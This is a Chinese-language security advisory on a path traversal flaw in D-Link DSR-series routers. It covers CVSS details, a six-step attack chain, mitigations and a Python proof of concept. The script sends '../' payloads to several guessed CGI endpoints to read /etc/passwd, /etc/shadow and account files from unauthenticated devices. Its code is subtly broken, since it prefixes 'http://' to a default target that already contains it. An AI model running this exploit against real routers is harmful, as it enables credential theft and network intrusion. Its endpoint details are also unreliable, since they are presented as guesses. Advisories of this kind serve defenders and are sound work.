CVE-2025-60344：D-Link DSR系列路由器路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-60344

漏洞类型

路径遍历（目录遍历）

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DSR系列路由器（DSR-150、DSR-150N、DSR-250N）

漏洞概述

CVE-2025-60344是D-Link DSR系列路由器中存在的一个高危路径遍历（Path Traversal）漏洞，也称为目录遍历漏洞。该漏洞允许未经认证的远程攻击者通过构造包含特殊路径序列（如"../"）的恶意输入参数，绕过路由器Web管理界面的正常路径解析逻辑，访问位于预期目录之外的文件系统资源。

该漏洞的CVSS 3.1评分为8.6分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），也无需用户交互（UI:N）。漏洞的影响范围已发生改变（S:C），主要对机密性造成高影响（C:H），但对完整性（I:N）和可用性（A:N）无直接影响。

受影响的设备型号包括D-Link DSR-150、DSR-150N和DSR-250N，固件版本为v1.09B32_WW。这些设备广泛部署于中小型企业环境中，作为VPN路由器和无线接入点使用。由于漏洞无需认证即可利用，且可通过网络远程触发，使得暴露在公网上的设备面临严重的数据泄露风险。攻击者可能利用此漏洞读取路由器的配置文件、密码文件、VPN凭证等敏感信息，从而进一步实施网络渗透攻击。

技术细节

路径遍历漏洞（Path Traversal）的根本原因在于应用程序对用户输入的文件或目录路径参数缺乏充分的验证和净化处理。当Web应用程序接收用户提供的路径参数并直接用于文件系统操作（如文件读取、包含或下载）时，攻击者可以通过在路径中插入目录遍历序列（如"../"或"..\\"）来跳出预期的目录限制。

在D-Link DSR系列路由器的受影响固件版本中，Web管理界面的某些CGI端点或HTTP请求处理模块未对用户提交的路径参数进行严格的合法性校验。攻击者可以构造类似"../../etc/passwd"或"../../../../../etc/shadow"的恶意路径，使服务器返回本不应被访问的系统敏感文件。

利用方式如下：
1. 攻击者首先通过网络扫描或Shodan等工具发现暴露在公网的D-Link DSR系列路由器管理界面；
2. 向目标设备的特定HTTP端点发送包含路径遍历序列的恶意请求；
3. 由于缺乏输入验证，服务器解析路径时跳出Web根目录，访问任意系统文件；
4. 敏感文件内容（如配置文件、凭证信息）通过HTTP响应返回给攻击者。

该漏洞属于典型的CWE-22（Path Traversal）类别，其利用门槛低，影响范围广，对企业网络安全构成严重威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者通过网络扫描工具（如Nmap、Shodan）发现暴露在公网的D-Link DSR系列路由器管理界面，识别目标设备的固件版本是否为v1.09B32_WW。

STEP 2

2. 漏洞探测

攻击者向目标设备的Web管理界面发送包含路径遍历序列的测试请求，验证目标是否存在CVE-2025-60344漏洞。

STEP 3

3. 构造恶意请求

攻击者构造包含'../'路径序列的HTTP请求，目标是访问路由器文件系统中的敏感文件，如/etc/passwd、配置文件等。

STEP 4

4. 读取敏感文件

由于缺乏输入验证，服务器处理请求时跳出预期目录，将敏感文件内容通过HTTP响应返回给攻击者。

STEP 5

5. 凭证提取与利用

攻击者从获取的配置文件中提取管理员凭证、VPN密钥等信息，利用这些信息进一步控制路由器或渗透内网。

STEP 6

6. 横向移动

获得路由器控制权后，攻击者可利用路由器作为跳板，对内网其他设备发起进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60344 - D-Link DSR Series Router Path Traversal PoC
# Affected: DSR-150, DSR-150N, DSR-250N v1.09B32_WW
# Author: Security Researcher

import requests
import sys
from urllib.parse import quote

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1"
PORT = 80

def exploit_path_traversal(target, port, path):
    """
    Exploit path traversal by injecting '../' sequences into vulnerable parameter
    """
    base_url = f"http://{target}:{port}"
    
    # Common vulnerable endpoints in D-Link DSR routers
    vulnerable_endpoints = [
        "/cgi-bin/webproc",
        "/scgi-bin/platform.cgi",
        "/login.cgi",
    ]
    
    # Target sensitive files
    target_files = [
        "/etc/passwd",
        "/etc/shadow",
        "/etc/config/accounts",
        "/var/passwd",
        "/var/secret",
        "/tmp/var/passwd",
    ]
    
    traversal_payload = "../../../../../../../../.."
    
    for endpoint in vulnerable_endpoints:
        for target_file in target_files:
            payload = traversal_payload + target_file
            encoded_payload = quote(payload)
            url = f"{base_url}{endpoint}?page={encoded_payload}"
            
            try:
                response = requests.get(url, timeout=10, verify=False)
                if response.status_code == 200 and "root:" in response.text:
                    print(f"[+] Vulnerability confirmed at {endpoint}")
                    print(f"[+] File accessed: {target_file}")
                    print(f"[+] Response:\n{response.text[:500]}")
                    return True
            except requests.exceptions.RequestException as e:
                continue
    
    return False

if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET}")
    if exploit_path_traversal(TARGET, PORT, ""):
        print("[+] Exploit successful!")
    else:
        print("[-] Target may not be vulnerable or not reachable")

影响范围

D-Link DSR-150 v1.09B32_WW

D-Link DSR-150N v1.09B32_WW

D-Link DSR-250N v1.09B32_WW

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）将D-Link DSR系列路由器的管理界面限制在内网访问，禁止从公网直接访问管理端口；2）在防火墙中配置访问控制列表（ACL），仅允许可信IP地址访问路由器Web管理界面；3）部署入侵检测/防御系统（IDS/IPS），监控和阻断包含路径遍历特征的恶意请求；4）定期检查路由器日志，及时发现异常访问行为；5）考虑使用替代路由器设备，因为DSR系列可能已停止安全更新支持。